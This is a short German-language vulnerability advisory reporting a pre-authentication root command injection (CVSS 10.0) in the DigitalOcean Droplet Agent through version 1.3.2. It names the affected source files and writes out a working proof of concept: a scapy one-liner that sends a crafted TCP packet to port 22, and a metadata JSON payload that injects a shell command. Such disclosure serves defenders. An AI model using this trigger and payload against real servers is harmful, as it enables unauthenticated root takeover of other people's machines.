
Kritische Pre-Auth Root-RCE (CVSS 10.0) im DigitalOcean Droplet Agent bis v1.3.2 durch Command Injection.
Kritische Pre-Auth Root RCE (CVSS 10.0) im DigitalOcean Droplet Agent bis v1.3.2 durch Command Injection.
Eine kritische Command-Injection-Schwachstelle wurde im DigitalOcean Droplet Agent (alle Versionen bis einschließlich 1.3.2) entdeckt. Dieser Fehler ermöglicht es einem Angreifer, Remote Code Execution (RCE) mit Root-Rechten ohne jegliche Authentifizierung zu erreichen.
Entdecker: Anmol Singh Rajput (@pox_sky_01) - Cortex Security Research
Die Schwachstelle existiert in der Troubleshooting-Actioner-Komponente:
internal/troubleshooting/actioner/actioner.gointernal/troubleshooting/command/exec.goDer Agent verarbeitet Metadaten vom lokalen Dienst (169.254.169.254) und führt Befehle aus dem -Array ohne ordnungsgemäße Bereinigung aus.
TroubleshootingAgent.RequestingDer Agent wird durch ein bestimmtes TCP-Paket an Port 22 ausgelöst:
Den Abruf auslösen:
python3 -c "from scapy.all import *; send(IP(dst='TARGET')/TCP(dport=22,flags='S',seq=68796879,ack=848489))"
Bösartige Metadaten-Payload:
{
"troubleshooting_agent": {
"requesting": ["command:id > /tmp/pwned"]
}
}
Auswirkungen CVSS-Score: 10.0 (Kritisch)
Erforderliche Privilegien: Keine
Ergebnis: Vollständige Systemkompromittierung (Root-Zugriff)
